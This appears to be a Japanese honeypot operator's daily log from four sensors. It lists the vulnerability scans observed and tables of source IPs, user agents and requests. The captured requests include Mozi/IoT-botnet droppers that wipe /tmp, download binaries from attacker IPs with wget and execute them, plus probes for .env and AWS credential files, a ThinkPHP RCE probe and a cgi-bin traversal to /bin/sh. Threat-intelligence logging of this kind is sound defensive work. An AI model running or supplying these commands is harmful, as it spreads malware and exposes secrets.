ハニーポット(仮) 観測記録 2021/11/21分です。
特徴
共通
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
/.envへのスキャン行為
Laravelへのスキャン行為
Location:JP
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
aiohttpによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
84[.]153[.]79[.]226に関する不正通信
110[.]242[.]68[.]4に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//120[.]193[.]91[.]200:49749/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
Location:US
Citrix製品の脆弱性(CVE-2019-19781)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Microsoft Exchange Serverの脆弱性(CVE-2018-16793)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
を確認しました。
Location:UK
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
を確認しました。
Location:SG
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.awsへのスキャン行為
Apache Solrへのスキャン行為
47[.]243[.]70[.]186に関する不正通信
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 185.245.96.227/bins/arm; chmod 777 /tmp/arm; sh /tmp/arm selfrep[.]jaws
cd /tmp; rm -rf *; wget 212[.]193[.]30[.]245/bins.sh; sh /tmp/bins.sh
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi[.]a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:116 (前日比:-13)
US:総アクセス数:100 (前日比:-3)
UK:総アクセス数:37 (前日比:+7)
SG:総アクセス数:54 (前日比:-14)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 3.236.16.141 | United States |
| 9 | 13.212.224.239 | United States |
| 1 | 34.77.162.22 | United States |
| 2 | 34.133.185.96 | United States |
| 1 | 36.32.3.43 | China |
| 2 | 37.49.225.132 | Belize |
| 1 | 40.127.201.191 | United States |
| 1 | 41.140.72.16 | Morocco |
| 4 | 45.137.21.9 | Bangladesh |
| 11 | 45.146.164.110 | Russia |
| 1 | 49.113.96.171 | China |
| 1 | 49.113.97.65 | China |
| 1 | 50.112.196.182 | United States |
| 1 | 51.158.156.78 | France |
| 1 | 58.210.180.187 | China |
| 1 | 60.208.166.184 | China |
| 1 | 64.227.98.253 | United States |
| 1 | 66.240.205.34 | United States |
| 1 | 89.25.206.171 | Poland |
| 7 | 91.218.66.250 | Germany |
| 1 | 104.248.113.209 | United States |
| 1 | 104.248.121.10 | United States |
| 1 | 110.167.215.6 | China |
| 1 | 120.193.91.200 | China |
| 1 | 123.191.136.162 | China |
| 1 | 125.76.177.197 | China |
| 1 | 128.14.134.170 | United States |
| 1 | 132.145.39.16 | United States |
| 11 | 135.125.244.48 | France |
| 1 | 137.184.197.67 | United States |
| 1 | 137.184.197.79 | United States |
| 1 | 137.184.197.90 | United States |
| 1 | 137.184.232.16 | United States |
| 1 | 143.198.89.201 | United States |
| 1 | 154.89.5.77 | Seychelles |
| 3 | 159.203.18.202 | United States |
| 3 | 161.35.212.57 | United States |
| 2 | 165.232.86.149 | United States |
| 1 | 171.36.142.251 | China |
| 1 | 178.72.78.3 | Russia |
| 1 | 180.149.125.165 | Mongolia |
| 2 | 185.53.90.24 | Belize |
| 2 | 185.254.31.134 | Turkey |
| 1 | 192.241.212.191 | United States |
| 4 | 193.56.29.183 | United Kingdom |
| 1 | 209.17.96.2 | United States |
| 4 | 209.141.34.220 | United States |
| 3 | 209.141.46.14 | United States |
| 10 | 218.206.137.60 | China |
| 1 | 220.200.162.223 | China |
| 1 | 220.200.163.85 | China |
| 1 | 223.167.75.148 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 14 | - |
| 2 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Hello, world |
| 3 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 |
| 6 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.172 Safari/537.36 Vivaldi/2.5.1525.48 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
| 10 | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko |
| 37 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 7 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36 |
| 9 | Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
| 4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
| 2 | Python/3.7 aiohttp/3.7.4.post0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | Gh0st\xad | ||
| 4 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01C\x01 | ||
| 7 | CONNECT | 84[.]153[.]79[.]226:4444 | HTTP/1.1 |
| 1 | CONNECT | cn[.]bing[.]com:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]baidu[.]com:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]so[.]com:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]voanews[.]com:443 | HTTP/1.1 |
| 1 | GET | /.aws/credentials | HTTP/1.1 |
| 1 | GET | /.aws/credentials%0A/api/.env%0A/vendor/.env%0A/lib/.env%0A/lab/.env%0A/cronlab/.env%0A/cron/.env%0A/core/.env%0A/core/app/.env%0A/core/database/.env%0A/database/.env%0A/config/.env%0A/assets/.env%0A/app/.env%0A/apps/.env%0A/uploads/.env%0A/sitemaps/.env%0A/site/.env%0A/admin/.env%0A/web/.env%0A/public/.env%0A/en/.env%0A/tools/.env%0A/v1/.env%0A/administrator/.env%0A/laravel/.env%0A/phpinfo%0A/phpinfo.php%0A/aws.yml%0A/config/aws.yml%0A/info.p | HTTP/1.1 |
| 36 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.env.bak | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=56v0fsag | HTTP/1.1 |
| 1 | GET | /AirWatch/Login | HTTP/1.1 |
| 1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
| 2 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /_profiler/phpinfo | HTTP/1.1 |
| 1 | GET | /app/.env | HTTP/1.1 |
| 1 | GET | /aws.yml | HTTP/1.1 |
| 1 | GET | /config.js | HTTP/1.1 |
| 1 | GET | /config/aws.yml | HTTP/1.1 |
| 7 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /core/.env | HTTP/1.1 |
| 2 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /info.php | HTTP/1.1 |
| 1 | GET | /invoker/readonly | HTTP/1.1 |
| 1 | GET | /jenkins/login | HTTP/1.1 |
| 1 | GET | /login | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /photo/ | HTTP/1.1 |
| 1 | GET | /phpinfo | HTTP/1.1 |
| 1 | GET | /phpinfo.php | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /public/.env | HTTP/1.1 |
| 1 | GET | /script | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//120[.]193[.]91[.]200:49749/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
| 1 | GET | /users/sign_in | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /wp-login.php | HTTP/1.1 |
| 2 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
| 1 | GET | http[:]//dongtaiwang[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]epochtimes[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]minghui[.]org/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]rfa[.]org/english/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]soso[.]com/ | HTTP/1.1 |
| 1 | GET | http[:]//www[.]wujieliulan[.]com/ | HTTP/1.1 |
| 2 | HEAD | / | HTTP/1.1 |
| 1 | HEAD | http[:]//110[.]242[.]68[.]4/ | HTTP/1.1 |
| 2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /_ignition/execute-solution | HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 2 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 2 | 45.137.21.9 | Bangladesh |
| 6 | 45.146.164.110 | Russia |
| 1 | 64.227.98.253 | United States |
| 1 | 104.248.113.209 | United States |
| 7 | 125.64.94.144 | China |
| 6 | 135.125.217.54 | France |
| 1 | 137.184.197.67 | United States |
| 1 | 137.184.197.91 | United States |
| 7 | 137.184.214.146 | United States |
| 1 | 137.184.232.16 | United States |
| 12 | 138.197.128.137 | United States |
| 2 | 185.53.90.24 | Belize |
| 1 | 192.241.207.214 | United States |
| 1 | 192.241.213.250 | United States |
| 1 | 193.118.53.194 | United States |
| 40 | 193.169.254.179 | Poland |
| 1 | 198.211.112.178 | United States |
| 1 | 209.17.97.18 | United States |
| 4 | 209.141.34.220 | United States |
| 4 | 209.141.46.14 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 9 | - |
| 2 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 6 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 |
| 40 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0 |
| 1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 |
| 18 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 9 | \x16\x03\x01 | ||
| 18 | GET | /.env | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /CACHE/sdesktop/install/start.htm | HTTP/1.1 |
| 1 | GET | /Login/Login | HTTP/1.1 |
| 1 | GET | /Remote/logon | HTTP/1.1 |
| 1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /actuator/health | HTTP/1.1 |
| 1 | GET | /admin/.env | HTTP/1.1 |
| 1 | GET | /api/.env | HTTP/1.1 |
| 1 | GET | /app/.env | HTTP/1.1 |
| 1 | GET | /application/.env | HTTP/1.1 |
| 1 | GET | /apps/.env | HTTP/1.1 |
| 1 | GET | /auth/.env | HTTP/1.1 |
| 1 | GET | /back/.env | HTTP/1.1 |
| 1 | GET | /backend/.env | HTTP/1.1 |
| 1 | GET | /cli/.env | HTTP/1.1 |
| 1 | GET | /config/.env | HTTP/1.1 |
| 8 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /core/.env | HTTP/1.1 |
| 1 | GET | /cp/.env | HTTP/1.1 |
| 1 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /dependencies/.env | HTTP/1.1 |
| 1 | GET | /deployment/.env | HTTP/1.1 |
| 1 | GET | /dev/.env | HTTP/1.1 |
| 1 | GET | /development/.env | HTTP/1.1 |
| 1 | GET | /doc/script/common.js | HTTP/1.1 |
| 1 | GET | /docker/.env | HTTP/1.1 |
| 1 | GET | /document/.env | HTTP/1.1 |
| 1 | GET | /engine/.env | HTTP/1.1 |
| 1 | GET | /framework/.env | HTTP/1.1 |
| 1 | GET | /frontend/.env | HTTP/1.1 |
| 1 | GET | /laravel-artisan/.env | HTTP/1.1 |
| 1 | GET | /laravel/.env | HTTP/1.1 |
| 1 | GET | /local/.env | HTTP/1.1 |
| 1 | GET | /login/.env | HTTP/1.1 |
| 1 | GET | /logon/LogonPoint/custom.html | HTTP/1.1 |
| 1 | GET | /logon/LogonPoint/index.html | HTTP/1.1 |
| 1 | GET | /logon/LogonPoint/tmindex.html | HTTP/1.1 |
| 1 | GET | /master/.env | HTTP/1.1 |
| 1 | GET | /owa/auth/logon.aspx | HTTP/1.1 |
| 1 | GET | /owa/auth/logon.aspx?replaceCurrent=1&url=http[:]//34[.]68[.]118[.]83/ecp | HTTP/1.1 |
| 1 | GET | /personal/.env | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /private/.env | HTTP/1.1 |
| 1 | GET | /project/.env | HTTP/1.1 |
| 1 | GET | /protected/.env | HTTP/1.1 |
| 1 | GET | /remote/login | HTTP/1.1 |
| 1 | GET | /rest/.env | HTTP/1.1 |
| 1 | GET | /search/.env | HTTP/1.1 |
| 1 | GET | /server/.env | HTTP/1.1 |
| 1 | GET | /shared/.env | HTTP/1.1 |
| 1 | GET | /site/.env | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /src/.env | HTTP/1.1 |
| 1 | GET | /sslvpn/Login/Login | HTTP/1.1 |
| 1 | GET | /system/.env | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | /vod_installer/.env | HTTP/1.1 |
| 1 | GET | /vpn/index.html | HTTP/1.1 |
| 1 | GET | /vue/.env | HTTP/1.1 |
| 1 | GET | /web/.env | HTTP/1.1 |
| 2 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 20.211.30.34 | United States |
| 1 | 34.96.130.4 | United States |
| 4 | 45.137.21.9 | Bangladesh |
| 11 | 45.146.164.110 | Russia |
| 1 | 59.36.168.250 | China |
| 1 | 104.224.29.59 | United States |
| 1 | 128.1.248.26 | United States |
| 2 | 157.245.70.127 | United States |
| 1 | 172.105.77.209 | United States |
| 1 | 180.149.125.171 | Mongolia |
| 2 | 185.53.90.24 | Belize |
| 2 | 185.254.31.134 | Turkey |
| 1 | 209.17.97.114 | United States |
| 5 | 209.141.34.220 | United States |
| 3 | 209.141.46.14 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 9 | - |
| 2 | Go-http-client/1.1 |
| 1 | Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 3 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0 |
| 8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 4 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01C\x01 | ||
| 3 | GET | /.env | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 1 | GET | /ab2g | HTTP/1.1 |
| 1 | GET | /ab2h | HTTP/1.1 |
| 8 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 2 | GET | /console/ | HTTP/1.1 |
| 2 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 27.43.178.63 | China |
| 1 | 34.77.162.29 | United States |
| 4 | 45.137.21.9 | Bangladesh |
| 8 | 45.146.164.110 | Russia |
| 1 | 47.96.250.29 | China |
| 1 | 64.227.69.47 | United States |
| 1 | 78.142.53.169 | Bulgaria |
| 1 | 95.111.226.137 | Germany |
| 1 | 110.10.58.175 | South Korea |
| 1 | 118.193.45.5 | Hong Kong |
| 1 | 128.14.141.34 | United States |
| 1 | 135.125.217.54 | France |
| 2 | 137.184.197.79 | United States |
| 7 | 137.184.214.146 | United States |
| 1 | 137.184.232.16 | United States |
| 1 | 143.198.120.120 | United States |
| 1 | 159.223.72.184 | United States |
| 1 | 161.97.76.130 | Germany |
| 1 | 175.107.1.28 | Pakistan |
| 1 | 180.149.125.168 | Mongolia |
| 2 | 185.53.90.24 | Belize |
| 2 | 185.254.31.134 | Turkey |
| 1 | 192.241.207.146 | United States |
| 1 | 195.133.18.100 | Czechia |
| 1 | 198.211.112.178 | United States |
| 1 | 209.17.96.242 | United States |
| 5 | 209.141.34.220 | United States |
| 4 | 209.141.46.14 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 2 | Go-http-client/1.1 |
| 1 | Hello, World |
| 2 | Hello, world |
| 1 | Mozilla/2.02E (Win95; U) |
| 1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
| 1 | Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36 |
| 15 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 9 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 4 | \x16\x03\x01 | ||
| 1 | \x16\x03\x01\x01C\x01 | ||
| 1 | \x16\x03\x01\x01\xfb\x01 | ||
| 2 | GET | /.aws/credentials%0A/api/.env%0A/vendor/.env%0A/lib/.env%0A/lab/.env%0A/cronlab/.env%0A/cron/.env%0A/core/.env%0A/core/app/.env%0A/core/database/.env%0A/database/.env%0A/config/.env%0A/assets/.env%0A/app/.env%0A/apps/.env%0A/uploads/.env%0A/sitemaps/.env%0A/site/.env%0A/admin/.env%0A/web/.env%0A/public/.env%0A/en/.env%0A/tools/.env%0A/v1/.env%0A/administrator/.env%0A/laravel/.env%0A/phpinfo%0A/phpinfo.php%0A/aws.yml%0A/config/aws.yml%0A/info.p | HTTP/1.1 |
| 14 | GET | /.env | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /Telerik.Web.UI.WebResource.axd?type=rau | HTTP/1.1 |
| 1 | GET | /_ignition/execute-solution | HTTP/1.1 |
| 9 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /console/ | HTTP/1.1 |
| 2 | GET | /currentsetting.htm | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 185.245.96.227/bins/arm;chmod+777+/tmp/arm;sh+/tmp/arm+selfrep[.]jaws | |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+212[.]193[.]30[.]245/bins.sh;sh+/tmp/bins.sh | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /stalker_portal/server/tools/auth_simple.php | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | http[:]//47[.]243[.]70[.]186:80/njtest | HTTP/1.0 |
| 2 | GET | http[:]//azenv[.]net/ | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
